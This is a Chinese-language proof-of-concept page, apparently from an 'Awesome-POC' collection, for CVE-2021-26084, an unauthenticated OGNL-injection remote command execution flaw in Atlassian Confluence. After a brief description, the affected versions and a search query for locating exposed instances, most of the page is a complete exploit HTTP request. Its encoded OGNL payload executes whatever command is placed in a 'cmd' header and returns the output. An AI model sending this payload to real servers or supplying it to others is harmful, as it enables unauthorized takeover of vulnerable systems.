Awesome-POC/Web应用漏洞/Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084.md
2024-11-06 14:10:36 +08:00

55 lines
2.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Atlassian Confluence doenterpagevariables.action 远程命令执行漏洞 CVE-2021-26084
## 漏洞描述
Atlassian Confluence 存在远程代码执行漏洞攻击者在无需认证即可构造恶意请求造成OGNL表达式注入从而执行任意代码控制服务器。
## 漏洞影响
```
Atlassian Atlassian Confluence < 7.4.11
Atlassian Atlassian Confluence < 7.11.6
Atlassian Atlassian Confluence < 7.13.0
Atlassian Atlassian Confluence < 6.13.23
Atlassian Atlassian Confluence < 7.12.5
```
## 网络测绘
```
app="ATLASSIAN-Confluence"
```
## 漏洞复现
登录页面
![image-20220524142010885](images/202205241420961.png)
发送请求包
```
![](C:/Users/47236/Desktop/1.png)POST /pages/doenterpagevariables.action HTTP/1.1
Host:
Connection: keep-alive
Content-Length: 599
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=3E654B6F4ADDF325CA2203596BD0115C
cmd: id
queryString=%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName%28%5Cu0022javax.script.ScriptEngineManager%5Cu0022%29.newInstance%28%29.getEngineByName%28%5Cu0022js%5Cu0022%29.eval%28%5Cu0022var+c%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getRequest%28%29.getHeader%28%5Cu0027cmd%5Cu0027%29%3Bvar+x%3Djava.lang.Runtime.getRuntime%28%29.exec%28c%29%3Bvar+out%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getResponse%28%29.getOutputStream%28%29%3Borg.apache.commons.io.IOUtils.copy%28x.getInputStream%28%29%2Cout%29%3Bout.flush%28%29%3B%5Cu0022%29%7D%2B%5Cu0027
```
![]()![](images/202205241420313.png)